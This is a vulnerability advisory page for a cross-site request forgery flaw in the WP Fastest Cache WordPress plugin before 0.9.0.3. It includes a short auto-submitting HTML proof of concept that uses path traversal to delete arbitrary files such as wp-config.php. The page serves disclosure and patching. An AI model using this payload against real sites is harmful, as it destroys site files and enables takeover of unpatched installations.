WP Fastest Cache < 0.9.0.3 – Cross-Site Request Forgery (CSRF) Arbitrary File Deletion | Plugin Vulnerabilities

Description

The plugin did not have a CSRF nonce check on the "wpfc_delete_current_page_cache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.

Proof of Concept

    <html>
    <head></head>
    <body>
    <form id="form" action="https://example.com/wp-admin/admin-ajax.php?path=/../../../.." method="post">
    <input type="hidden" name="action" value="wpfc_delete_current_page_cache"/>
    </form>
    <script>document.form.submit();</script>
    </body>
    </html>

Affects Plugins

wp-fastest-cache

Fixed in 0.9.0.3

References

URL

https://wearetradecraft.com/advisories/tc-2020-0001/

URL

https://plugins.trac.wordpress.org/changeset/2235160/wp-fastest-cache

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Glyn Wintle (Tradecraft)

Verified

No

WPVDB ID

1fb5a8a0-4769-4e1a-9119-a63afd9364cc

Timeline

Publicly Published

2020-02-05 (about 6 years ago)

Added

2020-03-09 (about 6 years ago)

Last Updated

2026-04-13 (about 29 days ago)

Other

Published

Title

Published

2024-03-12

Title

Tutor LMS – eLearning and online course solution < 2.6.2 - Cross-Site Request Forgery to Plugin Deactivation and Data Erase

Published

2025-02-11

Title

WP Abstracts < 2.7.4 - Cross-Site Request Forgery to Arbitrary Account Deletion

Published

2023-04-19

Title

Simple Share Buttons Adder < 8.5.1 - CSRF

Published

2023-11-20

Title

Auto Affiliate Links < 6.4.2.6 - Cross-Site Request Forgery

Published

2025-08-22

Title

WP Admin Theme <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting